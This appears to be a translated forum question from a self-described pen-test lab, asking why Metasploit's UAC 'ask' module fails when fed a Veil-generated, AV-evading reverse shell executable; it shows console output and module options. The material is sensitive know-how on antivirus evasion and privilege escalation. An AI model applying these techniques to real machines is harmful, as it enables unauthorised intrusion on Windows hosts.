我正在攻击的机器安装了防病毒软件。
我已经设法使用Veil 框架来创建一个初始的反向 shell 有效负载,该有效负载未被 AV 检测到。但是,在 Windows 7 目标上启用了 UAC。
我正在尝试使用 Metasploitexploit/windows/local/ask
来提示用户,希望他们单击“是”以允许有效负载创建另一个具有提升权限的反向 shell。
但是,AV 检测到默认的 metasploit 有效负载,因此我使用payload/generic/custom
设置PAYLOADFILE
为我的 Veil 生成的.exe
. 但是,在运行漏洞利用程序时,我收到以下错误消息:
msf exploit(ask) > exploit
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[-] Exploit failed: NoMethodError undefined method `length' for nil:NilClass
我意识到还有其他方法可以绕过 UAC:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
尽管作为此笔测试实验的一部分,我希望最终用户手动允许有效负载。
我的语法对漏洞利用是否正确:
msf exploit(ask) > show options
Module options (exploit/windows/local/ask):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 4 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload options (generic/custom):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOADFILE /usr/share/veil-output/compiled/payload_0907_cs.exe no The file to read the payload from
PAYLOADSTR no The string to use as a payload
Exploit target:
Id Name
-- ----
0 Windows
我已经用谷歌搜索了这个错误,但它似乎没有返回任何相关内容。我正在以正确的方式解决这个问题吗?